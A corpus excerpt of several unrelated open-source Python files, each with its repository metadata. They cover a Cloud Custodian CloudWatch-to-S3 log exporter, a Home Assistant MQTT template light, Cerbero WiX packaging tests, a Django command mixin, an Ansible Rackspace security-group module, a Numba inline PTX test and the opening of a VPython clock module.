for m in keys:
part = m['Prefix'].rsplit('/', 2)[-2]
if not part.isdigit():
continue
month = int(part)
date_key = (y, month)
months.append(month)
months.sort(reverse=True)
if not months:
continue
if latest:
months = [months[0]]
for m in months:
keys = client.list_objects_v2(
Bucket=bucket, Prefix="%s/%d/%s/" % (
prefix.strip('/'), y, ('%d' % m).rjust(2, '0')),
Delimiter='/').get('CommonPrefixes', [])
for d in keys:
part = d['Prefix'].rsplit('/', 2)[-2]
if not part.isdigit():
continue
day = int(part)
date_key = (y, m, day)
found.append(date_key)
found.sort(reverse=True)
if latest:
found = [found[0]]
return found
@cli.command()
@click.option('--group', required=True)
@click.option('--bucket', required=True)
@click.option('--prefix')
@click.option('--start', required=True, help="export logs from this date")
@click.option('--end')
@click.option('--role', help="sts role to assume for log group access")
@click.option('--poll-period', type=float, default=300)
# @click.option('--bucket-role', help="role to scan destination bucket")
# @click.option('--stream-prefix)
@lambdafan
def export(group, bucket, prefix, start, end, role, poll_period=120, session=None, name=""):
"""export a given log group to s3"""
start = start and isinstance(start, basestring) and parse(start) or start
end = (end and isinstance(start, basestring) and
parse(end) or end or datetime.now())
start = start.replace(tzinfo=tzlocal()).astimezone(tzutc())
end = end.replace(tzinfo=tzlocal()).astimezone(tzutc())
if session is None:
session = get_session(role)
client = session.client('logs')
for _group in client.describe_log_groups()['logGroups']:
if _group['logGroupName'] == group:
break
else:
raise ValueError('Log group not found.')
group = _group
if prefix:
prefix = "%s/%s" % (prefix.rstrip('/'), group['logGroupName'].strip('/'))
else:
prefix = group['logGroupName']
named_group = "%s:%s" % (name, group['logGroupName'])
log.info(
"Log exporting group:%s start:%s end:%s bucket:%s prefix:%s size:%s",
named_group,
start.strftime('%Y/%m/%d'),
end.strftime('%Y/%m/%d'),
bucket,
prefix,
group['storedBytes'])
t = time.time()
days = [(start + timedelta(i)).replace(
minute=0, hour=0, second=0, microsecond=0)
for i in range((end - start).days)]
day_count = len(days)
s3 = boto3.Session().client('s3')
days = filter_extant_exports(s3, bucket, prefix, days, start, end)
log.info("Group:%s filtering s3 extant keys from %d to %d start:%s end:%s",
named_group, day_count, len(days),
days[0] if days else '', days[-1] if days else '')
t = time.time()
retry = get_retry(('SlowDown',))
for idx, d in enumerate(days):
date = d.replace(minute=0, microsecond=0, hour=0)
export_prefix = "%s%s" % (prefix, date.strftime("/%Y/%m/%d"))
params = {
'taskName': "%s-%s" % ("c7n-log-exporter",
date.strftime("%Y-%m-%d")),
'logGroupName': group['logGroupName'],
'fromTime': int(time.mktime(
date.replace(
minute=0, microsecond=0, hour=0).timetuple()) * 1000),
'to': int(time.mktime(
date.replace(
minute=59, hour=23, microsecond=0).timetuple()) * 1000),
'destination': bucket,
'destinationPrefix': export_prefix
}
# if stream_prefix:
# params['logStreamPrefix'] = stream_prefix
try:
s3.head_object(Bucket=bucket, Key=prefix)
except ClientError as e:
if e.response['Error']['Code'] != '404': # Not Found
raise
s3.put_object(
Bucket=bucket,
Key=prefix,
Body=json.dumps({}),
ACL="bucket-owner-full-control",
ServerSideEncryption="AES256")
t = time.time()
counter = 0
while True:
counter += 1
try:
result = client.create_export_task(**params)
except ClientError as e:
if e.response['Error']['Code'] == 'LimitExceededException':
time.sleep(poll_period)
# log every 30m of export waiting
if counter % 6 == 0:
log.debug(
"group:%s day:%s waiting for %0.2f minutes",
named_group, d.strftime('%Y-%m-%d'),
(counter * poll_period) / 60.0)
continue
raise
retry(
s3.put_object_tagging,
Bucket=bucket, Key=prefix,
Tagging={
'TagSet': [{
'Key': 'LastExport',
'Value': d.isoformat()}]})
break
log.info(
"Log export time:%0.2f group:%s day:%s bucket:%s prefix:%s task:%s",
time.time() - t,
named_group,
d.strftime("%Y-%m-%d"),
bucket,
params['destinationPrefix'],
result['taskId'])
log.info(
("Exported log group:%s time:%0.2f days:%d start:%s"
" end:%s bucket:%s prefix:%s"),
named_group,
time.time() - t,
len(days),
start.strftime('%Y/%m/%d'),
end.strftime('%Y/%m/%d'),
bucket,
prefix)
if __name__ == '__main__':
cli()
|
sixfeetup/cloud-custodian
|
tools/c7n_logexporter/c7n_logexporter/exporter.py
|
Python
|
apache-2.0
| 26,318 | 0.00057 |
"""
Support for MQTT Template lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/light.mqtt_template/
"""
import logging
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components import mqtt
from homeassistant.components.light import (
ATTR_BRIGHTNESS, ATTR_COLOR_TEMP, ATTR_EFFECT, ATTR_FLASH,
ATTR_HS_COLOR, ATTR_TRANSITION, ATTR_WHITE_VALUE, Light,
SUPPORT_BRIGHTNESS, SUPPORT_COLOR_TEMP, SUPPORT_EFFECT, SUPPORT_FLASH,
SUPPORT_COLOR, SUPPORT_TRANSITION, SUPPORT_WHITE_VALUE)
from homeassistant.const import (
CONF_DEVICE, CONF_NAME, CONF_OPTIMISTIC, STATE_ON, STATE_OFF)
from homeassistant.components.mqtt import (
CONF_AVAILABILITY_TOPIC, CONF_STATE_TOPIC, CONF_COMMAND_TOPIC,
CONF_PAYLOAD_AVAILABLE, CONF_PAYLOAD_NOT_AVAILABLE, CONF_QOS, CONF_RETAIN,
MqttAvailability, MqttDiscoveryUpdate, MqttEntityDeviceInfo, subscription)
import homeassistant.helpers.config_validation as cv
import homeassistant.util.color as color_util
from homeassistant.helpers.restore_state import RestoreEntity
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'mqtt_template'
DEPENDENCIES = ['mqtt']
DEFAULT_NAME = 'MQTT Template Light'
DEFAULT_OPTIMISTIC = False
CONF_BLUE_TEMPLATE = 'blue_template'
CONF_BRIGHTNESS_TEMPLATE = 'brightness_template'
CONF_COLOR_TEMP_TEMPLATE = 'color_temp_template'
CONF_COMMAND_OFF_TEMPLATE = 'command_off_template'
CONF_COMMAND_ON_TEMPLATE = 'command_on_template'
CONF_EFFECT_LIST = 'effect_list'
CONF_EFFECT_TEMPLATE = 'effect_template'
CONF_GREEN_TEMPLATE = 'green_template'
CONF_RED_TEMPLATE = 'red_template'
CONF_STATE_TEMPLATE = 'state_template'
CONF_WHITE_VALUE_TEMPLATE = 'white_value_template'
CONF_UNIQUE_ID = 'unique_id'
PLATFORM_SCHEMA_TEMPLATE = mqtt.MQTT_RW_PLATFORM_SCHEMA.extend({
vol.Optional(CONF_BLUE_TEMPLATE): cv.template,
vol.Optional(CONF_BRIGHTNESS_TEMPLATE): cv.template,
vol.Optional(CONF_COLOR_TEMP_TEMPLATE): cv.template,
vol.Optional(CONF_EFFECT_LIST): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_EFFECT_TEMPLATE): cv.template,
vol.Optional(CONF_GREEN_TEMPLATE): cv.template,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_OPTIMISTIC, default=DEFAULT_OPTIMISTIC): cv.boolean,
vol.Optional(CONF_RED_TEMPLATE): cv.template,
vol.Optional(CONF_RETAIN, default=mqtt.DEFAULT_RETAIN): cv.boolean,
vol.Optional(CONF_STATE_TEMPLATE): cv.template,
vol.Optional(CONF_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_WHITE_VALUE_TEMPLATE): cv.template,
vol.Required(CONF_COMMAND_OFF_TEMPLATE): cv.template,
vol.Required(CONF_COMMAND_ON_TEMPLATE): cv.template,
vol.Required(CONF_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_QOS, default=mqtt.DEFAULT_QOS):
vol.All(vol.Coerce(int), vol.In([0, 1, 2])),
vol.Optional(CONF_UNIQUE_ID): cv.string,
vol.Optional(CONF_DEVICE): mqtt.MQTT_ENTITY_DEVICE_INFO_SCHEMA,
}).extend(mqtt.MQTT_AVAILABILITY_SCHEMA.schema)
async def async_setup_entity_template(hass, config, async_add_entities,
discovery_hash):
"""Set up a MQTT Template light."""
async_add_entities([MqttTemplate(config, discovery_hash)])
# pylint: disable=too-many-ancestors
class MqttTemplate(MqttAvailability, MqttDiscoveryUpdate, MqttEntityDeviceInfo,
Light, RestoreEntity):
"""Representation of a MQTT Template light."""
def __init__(self, config, discovery_hash):
"""Initialize a MQTT Template light."""
self._state = False
self._sub_state = None
self._topics = None
self._templates = None
self._optimistic = False
# features
self._brightness = None
self._color_temp = None
self._white_value = None
self._hs = None
self._effect = None
self._unique_id = config.get(CONF_UNIQUE_ID)
# Load config
self._setup_from_config(config)
availability_topic = config.get(CONF_AVAILABILITY_TOPIC)
payload_available = config.get(CONF_PAYLOAD_AVAILABLE)
payload_not_available = config.get(CONF_PAYLOAD_NOT_AVAILABLE)
qos = config.get(CONF_QOS)
device_config = config.get(CONF_DEVICE)
MqttAvailability.__init__(self, availability_topic, qos,
payload_available, payload_not_available)
MqttDiscoveryUpdate.__init__(self, discovery_hash,
self.discovery_update)
MqttEntityDeviceInfo.__init__(self, device_config)
async def async_added_to_hass(self):
"""Subscribe to MQTT events."""
await super().async_added_to_hass()
await self._subscribe_topics()
async def discovery_update(self, discovery_payload):
"""Handle updated discovery message."""
config = PLATFORM_SCHEMA_TEMPLATE(discovery_payload)
self._setup_from_config(config)
await self.availability_discovery_update(config)
await self._subscribe_topics()
self.async_schedule_update_ha_state()
def _setup_from_config(self, config):
"""(Re)Setup the entity."""
self._config = config
self._topics = {
key: config.get(key) for key in (
CONF_STATE_TOPIC,
CONF_COMMAND_TOPIC
)
}
self._templates = {
key: config.get(key) for key in (
CONF_BLUE_TEMPLATE,
CONF_BRIGHTNESS_TEMPLATE,
CONF_COLOR_TEMP_TEMPLATE,
CONF_COMMAND_OFF_TEMPLATE,
CONF_COMMAND_ON_TEMPLATE,
CONF_EFFECT_TEMPLATE,
CONF_GREEN_TEMPLATE,
CONF_RED_TEMPLATE,
CONF_STATE_TEMPLATE,
CONF_WHITE_VALUE_TEMPLATE,
)
}
optimistic = config.get(CONF_OPTIMISTIC)
self._optimistic = optimistic \
or self._topics[CONF_STATE_TOPIC] is None \
or self._templates[CONF_STATE_TEMPLATE] is None
# features
if self._templates[CONF_BRIGHTNESS_TEMPLATE] is not None:
self._brightness = 255
else:
self._brightness = None
if self._templates[CONF_COLOR_TEMP_TEMPLATE] is not None:
self._color_temp = 255
else:
self._color_temp = None
if self._templates[CONF_WHITE_VALUE_TEMPLATE] is not None:
self._white_value = 255
else:
self._white_value = None
if (self._templates[CONF_RED_TEMPLATE] is not None and
self._templates[CONF_GREEN_TEMPLATE] is not None and
self._templates[CONF_BLUE_TEMPLATE] is not None):
self._hs = [0, 0]
else:
self._hs = None
self._effect = None
async def _subscribe_topics(self):
"""(Re)Subscribe to topics."""
for tpl in self._templates.values():
if tpl is not None:
tpl.hass = self.hass
last_state = await self.async_get_last_state()
@callback
def state_received(topic, payload, qos):
"""Handle new MQTT messages."""
state = self._templates[CONF_STATE_TEMPLATE].\
async_render_with_possible_json_value(payload)
if state == STATE_ON:
self._state = True
elif state == STATE_OFF:
self._state = False
else:
_LOGGER.warning("Invalid state value received")
if self._brightness is not None:
try:
self._brightness = int(
self._templates[CONF_BRIGHTNESS_TEMPLATE].
async_render_with_possible_json_value(payload)
)
except ValueError:
_LOGGER.warning("Invalid brightness value received")
if self._color_temp is not None:
try:
self._color_temp = int(
self._templates[CONF_COLOR_TEMP_TEMPLATE].
async_render_with_possible_json_value(payload)
)
except ValueError:
_LOGGER.warning("Invalid color temperature value received")
if self._hs is not None:
try:
red = int(
self._templates[CONF_RED_TEMPLATE].
async_render_with_possible_json_value(payload))
green = int(
self._templates[CONF_GREEN_TEMPLATE].
async_render_with_possible_json_value(payload))
blue = int(
self._templates[CONF_BLUE_TEMPLATE].
async_render_with_possible_json_value(payload))
self._hs = color_util.color_RGB_to_hs(red, green, blue)
except ValueError:
_LOGGER.warning("Invalid color value received")
if self._white_value is not None:
try:
self._white_value = int(
self._templates[CONF_WHITE_VALUE_TEMPLATE].
async_render_with_possible_json_value(payload)
)
except ValueError:
_LOGGER.warning('Invalid white value received')
if self._templates[CONF_EFFECT_TEMPLATE] is not None:
effect = self._templates[CONF_EFFECT_TEMPLATE].\
async_render_with_possible_json_value(payload)
if effect in self._config.get(CONF_EFFECT_LIST):
self._effect = effect
else:
_LOGGER.warning("Unsupported effect value received")
self.async_schedule_update_ha_state()
if self._topics[CONF_STATE_TOPIC] is not None:
self._sub_state = await subscription.async_subscribe_topics(
self.hass, self._sub_state,
{'state_topic': {'topic': self._topics[CONF_STATE_TOPIC],
'msg_callback': state_received,
'qos': self._config.get(CONF_QOS)}})
if self._optimistic and last_state:
self._state = last_state.state == STATE_ON
if last_state.attributes.get(ATTR_BRIGHTNESS):
self._brightness = last_state.attributes.get(ATTR_BRIGHTNESS)
if last_state.attributes.get(ATTR_HS_COLOR):
self._hs = last_state.attributes.get(ATTR_HS_COLOR)
if last_state.attributes.get(ATTR_COLOR_TEMP):
self._color_temp = last_state.attributes.get(ATTR_COLOR_TEMP)
if last_state.attributes.get(ATTR_EFFECT):
self._effect = last_state.attributes.get(ATTR_EFFECT)
if last_state.attributes.get(ATTR_WHITE_VALUE):
self._white_value = last_state.attributes.get(ATTR_WHITE_VALUE)
async def async_will_remove_from_hass(self):
"""Unsubscribe when removed."""
self._sub_state = await subscription.async_unsubscribe_topics(
self.hass, self._sub_state)
await MqttAvailability.async_will_remove_from_hass(self)
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
return self._brightness
@property
def color_temp(self):
"""Return the color temperature in mired."""
return self._color_temp
@property
def hs_color(self):
"""Return the hs color value [int, int]."""
return self._hs
@property
def white_value(self):
"""Return the white property."""
return self._white_value
@property
def should_poll(self):
"""Return True if entity has to be polled for state.
False if entity pushes its state to HA.
"""
return False
@property
def name(self):
"""Return the name of the entity."""
return self._config.get(CONF_NAME)
@property
def unique_id(self):
"""Return a unique ID."""
return self._unique_id
@property
def is_on(self):
"""Return True if entity is on."""
return self._state
@property
def assumed_state(self):
"""Return True if unable to access real state of the entity."""
return self._optimistic
@property
def effect_list(self):
"""Return the list of supported effects."""
return self._config.get(CONF_EFFECT_LIST)
@property
def effect(self):
"""Return the current effect."""
return self._effect
async def async_turn_on(self, **kwargs):
"""Turn the entity on.
This method is a coroutine.
"""
values = {'state': True}
if self._optimistic:
self._state = True
if ATTR_BRIGHTNESS in kwargs:
values['brightness'] = int(kwargs[ATTR_BRIGHTNESS])
if self._optimistic:
self._brightness = kwargs[ATTR_BRIGHTNESS]
if ATTR_COLOR_TEMP in kwargs:
values['color_temp'] = int(kwargs[ATTR_COLOR_TEMP])
if self._optimistic:
self._color_temp = kwargs[ATTR_COLOR_TEMP]
if ATTR_HS_COLOR in kwargs:
hs_color = kwargs[ATTR_HS_COLOR]
# If there's a brightness topic set, we don't want to scale the RGB
# values given using the brightness.
if self._templates[CONF_BRIGHTNESS_TEMPLATE] is not None:
brightness = 255
else:
brightness = kwargs.get(
ATTR_BRIGHTNESS, self._brightness if self._brightness else
255)
rgb = color_util.color_hsv_to_RGB(
hs_color[0], hs_color[1], brightness / 255 * 100)
values['red'] = rgb[0]
values['green'] = rgb[1]
values['blue'] = rgb[2]
if self._optimistic:
self._hs = kwargs[ATTR_HS_COLOR]
if ATTR_WHITE_VALUE in kwargs:
values['white_value'] = int(kwargs[ATTR_WHITE_VALUE])
if self._optimistic:
self._white_value = kwargs[ATTR_WHITE_VALUE]
if ATTR_EFFECT in kwargs:
values['effect'] = kwargs.get(ATTR_EFFECT)
if ATTR_FLASH in kwargs:
values['flash'] = kwargs.get(ATTR_FLASH)
if ATTR_TRANSITION in kwargs:
values['transition'] = int(kwargs[ATTR_TRANSITION])
mqtt.async_publish(
self.hass, self._topics[CONF_COMMAND_TOPIC],
self._templates[CONF_COMMAND_ON_TEMPLATE].async_render(**values),
self._config.get(CONF_QOS), self._config.get(CONF_RETAIN)
)
if self._optimistic:
self.async_schedule_update_ha_state()
async def async_turn_off(self, **kwargs):
"""Turn the entity off.
This method is a coroutine.
"""
values = {'state': False}
if self._optimistic:
self._state = False
if ATTR_TRANSITION in kwargs:
values['transition'] = int(kwargs[ATTR_TRANSITION])
mqtt.async_publish(
self.hass, self._topics[CONF_COMMAND_TOPIC],
self._templates[CONF_COMMAND_OFF_TEMPLATE].async_render(**values),
self._config.get(CONF_QOS), self._config.get(CONF_RETAIN)
)
if self._optimistic:
self.async_schedule_update_ha_state()
@property
def supported_features(self):
"""Flag supported features."""
features = (SUPPORT_FLASH | SUPPORT_TRANSITION)
if self._brightness is not None:
features = features | SUPPORT_BRIGHTNESS
if self._hs is not None:
features = features | SUPPORT_COLOR
if self._config.get(CONF_EFFECT_LIST) is not None:
features = features | SUPPORT_EFFECT
if self._color_temp is not None:
features = features | SUPPORT_COLOR_TEMP
if self._white_value is not None:
features = features | SUPPORT_WHITE_VALUE
return features
|
tinloaf/home-assistant
|
homeassistant/components/light/mqtt/schema_template.py
|
Python
|
apache-2.0
| 16,276 | 0 |
# cerbero - a multi-platform build system for Open Source software
# Copyright (C) 2012 Andoni Morales Alastruey <ylatuya@gmail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
import unittest
import StringIO
from cerbero import hacks
from cerbero.build import recipe
from cerbero.config import Platform
from cerbero.packages import package
from cerbero.packages.wix import MergeModule
from cerbero.utils import etree
from test.test_build_common import create_cookbook
from test.test_packages_common import create_store
from test.test_common import DummyConfig
class Recipe1(recipe.Recipe):
name = 'recipe-test'
files_misc = ['bin/test.exe', 'bin/test2.exe', 'bin/test3.exe',
'README', 'lib/libfoo.dll', 'lib/gstreamer-0.10/libgstplugins.dll']
class Package(package.Package):
name = 'gstreamer-test'
shortdesc = 'GStreamer Test'
longdesc = 'test'
version = '1.0'
licences = ['LGPL']
uuid = '1'
vendor = 'GStreamer Project'
files = ['recipe-test:misc']
MERGE_MODULE = '''\
<?xml version="1.0" ?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Module Id="_gstreamer_test" Language="1033" Version="1.0">
<Package Comments="test" Description="GStreamer Test" Id="1" Manufacturer="GStreamer Project"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Component Guid="1" Id="_readme">
<File Id="_readme_1" Name="README" Source="z:\\\\\\test\\\\README"/>
</Component>
<Directory Id="_bin" Name="bin">
<Component Guid="1" Id="_test.exe">
<File Id="_testexe" Name="test.exe" Source="z:\\\\\\test\\\\bin\\\\test.exe"/>
</Component>
<Component Guid="1" Id="_test2.exe">
<File Id="_test2exe" Name="test2.exe" Source="z:\\\\\\test\\\\bin\\\\test2.exe"/>
</Component>
<Component Guid="1" Id="_test3.exe">
<File Id="_test3exe" Name="test3.exe" Source="z:\\\\\\test\\\\bin\\\\test3.exe"/>
</Component>
</Directory>
<Directory Id="_lib" Name="lib">
<Directory Id="_gstreamer_0.10" Name="gstreamer-0.10">
<Component Guid="1" Id="_libgstplugins.dll">
<File Id="_libgstpluginsdll" Name="libgstplugins.dll" Source="z:\\\\\\test\\\\lib\\\\gstreamer-0.10\\\\libgstplugins.dll"/>
</Component>
</Directory>
<Component Guid="1" Id="_libfoo.dll">
<File Id="_libfoodll" Name="libfoo.dll" Source="z:\\\\\\test\\\\lib\\\\libfoo.dll"/>
</Component>
</Directory>
</Directory>
</Module>
</Wix>
'''
class MergeModuleTest(unittest.TestCase):
def setUp(self):
self.config = DummyConfig()
cb = create_cookbook(self.config)
store = create_store(self.config)
cb.add_recipe(Recipe1(self.config))
self.package = Package(self.config, store, cb)
self.mergemodule = MergeModule(self.config,
self.package.files_list(), self.package)
def test_add_root(self):
self.mergemodule._add_root()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi" />',
etree.tostring(self.mergemodule.root))
def test_add_module(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">'
'<Module Id="_gstreamer_test" Language="1033" Version="1.0" />'
'</Wix>', etree.tostring(self.mergemodule.root))
def test_add_package(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">'
'<Module Id="_gstreamer_test" Language="1033" Version="1.0">'
'<Package Comments="test" Description="GStreamer Test" Id="1" '
'Manufacturer="GStreamer Project" />'
'</Module>'
'</Wix>', etree.tostring(self.mergemodule.root))
def test_add_root_dir(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.mergemodule._add_root_dir()
self.assertEquals(
'<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">'
'<Module Id="_gstreamer_test" Language="1033" Version="1.0">'
'<Package Comments="test" Description="GStreamer Test" Id="1" '
'Manufacturer="GStreamer Project" />'
'<Directory Id="TARGETDIR" Name="SourceDir" />'
'</Module>'
'</Wix>', etree.tostring(self.mergemodule.root))
def test_add_directory(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.mergemodule._add_root_dir()
self.assertEquals(len(self.mergemodule._dirnodes), 1)
self.assertEquals(self.mergemodule._dirnodes[''], self.mergemodule.rdir)
self.mergemodule._add_directory('lib/gstreamer-0.10')
self.assertEquals(len(self.mergemodule._dirnodes), 3)
self.assertTrue('lib' in self.mergemodule._dirnodes)
self.assertTrue('lib/gstreamer-0.10' in self.mergemodule._dirnodes)
self.mergemodule._add_directory('bin')
self.assertEquals(len(self.mergemodule._dirnodes), 4)
self.assertTrue('bin' in self.mergemodule._dirnodes)
def test_add_file(self):
self.mergemodule._add_root()
self.mergemodule._add_module()
self.mergemodule._add_package()
self.mergemodule._add_root_dir()
self.assertEquals(len(self.mergemodule._dirnodes), 1)
self.assertEquals(self.mergemodule._dirnodes[''], self.mergemodule.rdir)
self.mergemodule._add_file('bin/gst-inspect-0.10.exe')
self.assertEquals(len(self.mergemodule._dirnodes), 2)
self.assertTrue('bin' in self.mergemodule._dirnodes)
self.assertTrue('gstreamer-0.10.exe' not in self.mergemodule._dirnodes)
self.mergemodule._add_file('bin/gst-launch-0.10.exe')
self.assertEquals(len(self.mergemodule._dirnodes), 2)
self.assertTrue('bin' in self.mergemodule._dirnodes)
self.assertTrue('gstreamer-0.10.exe' not in self.mergemodule._dirnodes)
def test_render_xml(self):
self.config.platform = Platform.WINDOWS
self.mergemodule._get_uuid = lambda : '1'
self.mergemodule.fill()
tmp = StringIO.StringIO()
self.mergemodule.write(tmp)
#self._compstr(tmp.getvalue(), MERGE_MODULE)
self.assertEquals(MERGE_MODULE, tmp.getvalue())
def _compstr(self, str1, str2):
str1 = str1.split('\n')
str2 = str2.split('\n')
for i in range(len(str1)):
if str1[i] != str2[i]:
print str1[i]
print str2[i]
print ""
class InstallerTest(unittest.TestCase):
def setUp(self):
pass
def testAddRoot(self):
pass
def testAddProduct(self):
pass
def testAddPackage(self):
pass
def testAddInstallDir(self):
pass
def testAddUIProps(self):
pass
def testAddMedia(self):
pass
def testAddMergeModules(self):
pass
def testAddMergeModules(self):
pass
def testRender(self):
pass
|
cee1/cerbero-mac
|
test/test_cerbero_packages_wix.py
|
Python
|
lgpl-2.1
| 8,020 | 0.006733 |
import os
from django.core.management.color import supports_color
from django.utils import termcolors
class VerboseCommandMixin(object):
def __init__(self, *args, **kwargs):
super(VerboseCommandMixin, self).__init__(*args, **kwargs)
self.dry_run = False
if supports_color():
opts = ('bold',)
self.style.EXISTS = \
termcolors.make_style(fg='blue', opts=opts)
self.style.APPEND = \
termcolors.make_style(fg='yellow', opts=opts)
self.style.CREATE = \
termcolors.make_style(fg='green', opts=opts)
self.style.REVERT = \
termcolors.make_style(fg='magenta', opts=opts)
self.style.BACKUP = \
termcolors.make_style(fg='cyan', opts=opts)
def msg(self, action, path):
is_withholding_action = False
non_actions = set(['create', 'append', 'revert'])
if self.dry_run and action in non_actions:
is_withholding_action = True
if hasattr(self.style, action.upper()):
s = getattr(self.style, action.upper())
action = s(action)
if is_withholding_action:
action = self.style.NOTICE('did not ') + action
output = '\t{0:>25}\t{1:<}\n'.format(action, os.path.relpath(path))
self.stdout.write(output)
def log(self, output):
if self.verbose:
self.stdout.write(output)
|
noslenfa/tdjangorest
|
uw/lib/python2.7/site-packages/generate_scaffold/management/verbosity.py
|
Python
|
apache-2.0
| 1,463 | 0 |
"""Dummy module to create rax security groups"""
#!/usr/bin/env python
import pyrax
from ansible.module_utils.basic import *
uri_sgs = 'https://dfw.networks.api.rackspacecloud.com/v2.0/security-groups'
def get_sg(cnw, name):
try:
result, sgs = cnw.identity.method_get(uri_sgs)
if result.status_code == 200:
sg_list = filter(lambda sg: sg['name'] == name,
sgs['security_groups'])
return result.status_code, sg_list
except Exception as e:
return e.code, {'status': e.code, 'message': e.message}
def rax_security_group_present(data):
name = data['name']
description = data['description']
cnw = pyrax.cloud_networks
# If already exists, just return the first matching id
result, sg_list = get_sg(cnw, name)
if sg_list:
return False, False, sg_list[0]
data_json = {
'security_group': {
'name': name,
'description' : description
}
}
try:
result, sg = cnw.identity.method_post(uri_sgs, data=data_json)
if result.status_code == 201:
return False, True, result.json()['security_group']
elif result.status_code == 422:
return False, False, result.json()
else:
return True, False, {'status': result.status_code, 'data':
result.json()}
except Exception as e:
return True, False, {'status': 'ERROR', 'data': e.message}
def rax_security_group_absent(data=None):
cnw = pyrax.cloud_networks
name = data['name']
status_code, sg_list = get_sg(cnw, name)
result = None
for sg in sg_list:
sg_id = sg['id']
try:
result, _ = cnw.identity.method_delete(uri_sgs + '/' + sg_id)
if result.status_code == 200:
continue
except pyrax.exceptions.ClientException as e:
if e.code == 409:
return True, False, {'status': 'ERROR',
'security_group_id': sg_id,
'data': 'Security group in use'
}
except Exception as e:
return True, False, {'status': 'ERROR',
'security_group_id': sg_id}
if result:
return False, True, {'status': 'deleted', 'deleted_security_groups':
[sg['id'] for sg in sg_list]}
else:
return False, False, {'status': 'security group not found', 'security_groups':
sg_list}
def main():
fields = {
'name': {'required': True, 'type': 'str'},
'description': {'required': False, 'type': 'str'},
'region': {'required': True, 'type': 'str'},
'state': {
'default': 'present',
'choices': ['present', 'absent'],
'type': 'str'
}
}
choice_map = {
'present': rax_security_group_present,
'absent': rax_security_group_absent
}
module = AnsibleModule(argument_spec=fields)
pyrax.set_setting('identity_type', 'rackspace')
pyrax.set_credential_file('rax.py')
pyrax.set_setting('region', module.params['region'])
is_error, has_changed, result = \
choice_map.get(module.params['state'])(module.params)
if not is_error:
module.exit_json(changed=has_changed, security_group=result)
else:
module.fail_json(msg='Error', security_group=result)
if __name__ == '__main__':
main()
|
xroot88/rax_ansible
|
library/rax_security_group.py
|
Python
|
apache-2.0
| 3,554 | 0.002532 |
from __future__ import print_function, division, absolute_import
from llvmlite.llvmpy.core import Module, Type, Builder, InlineAsm
from llvmlite import binding as ll
from numba.cuda.cudadrv import nvvm
from numba.cuda.testing import unittest, CUDATestCase
from numba.cuda.testing import skip_on_cudasim
@skip_on_cudasim('Inline PTX cannot be used in the simulator')
class TestCudaInlineAsm(CUDATestCase):
def test_inline_rsqrt(self):
mod = Module.new(__name__)
fnty = Type.function(Type.void(), [Type.pointer(Type.float())])
fn = mod.add_function(fnty, 'cu_rsqrt')
bldr = Builder.new(fn.append_basic_block('entry'))
rsqrt_approx_fnty = Type.function(Type.float(), [Type.float()])
inlineasm = InlineAsm.get(rsqrt_approx_fnty,
'rsqrt.approx.f32 $0, $1;',
'=f,f', side_effect=True)
val = bldr.load(fn.args[0])
res = bldr.call(inlineasm, [val])
bldr.store(res, fn.args[0])
bldr.ret_void()
# generate ptx
nvvm.fix_data_layout(mod)
nvvm.set_cuda_kernel(fn)
nvvmir = str(mod)
ptx = nvvm.llvm_to_ptx(nvvmir)
self.assertTrue('rsqrt.approx.f32' in str(ptx))
if __name__ == '__main__':
unittest.main()
|
GaZ3ll3/numba
|
numba/cuda/tests/cudadrv/test_inline_ptx.py
|
Python
|
bsd-2-clause
| 1,302 | 0 |
# -*- coding: utf-8 -*-
import os
"""Clock for VPython - Complex (cx@cx.hu) 2003. - Licence: Python
Usage:
from visual import *
from cxvp_clock import *
clk=Clock3D()
while 1:
rate(1)
clk.update()
See doc strings for more.
Run this module to test clocks.
TODO: More types of clocks, such as 3D digital,
church clock, hour-glass, pendulum clock, stopper, etc...
Modifications:
2003.01.23. - Complex (cx@cx.hu): First release
2003.01.23. - Complex (cx@cx.hu): now gmtime imported correctly
"""
__all__ = ['Clock3D']
from visual import *
from visual.text import text
from time import time, localtime, gmtime
from math import sin, cos, pi
def Clock3D(clock_type='analog', *args, **kw):
"""Create a clock with specified type,
keyword arguments are passed through,
returns a VPython object derived from frame"""
if clock_type == 'analog':
return AnalogClock(*args, **kw)
raise ValueError('Invalid 3D clock type: %r' % (type,))
class Base(object):
"""Base class to pass specific keyword
arguments with convenient defaults"""
def __init__(self, kwlist=[], *args, **kw):
self.kwlist = kwlist
for k, v in kwlist.items():
if kw.has_key(k):
v = kw[k]
del kw[k]
self.__dict__[k] = v
self.args = args
self.kw = kw
class AnalogClock(Base):
"""Analog clock, keyword arguments:
frame=reference frame to use (default: None),
pointers=pointers to display, cobination of characters 'h', 'm' and 's' (default: 'hms')
ring_color=color of ring around the clock (default: color.yellow)
back_color=color of clock's back plate (default: color.white)
big_tick_color=color of big ticks (at 12,3,6,9 hours) (default: color.red)
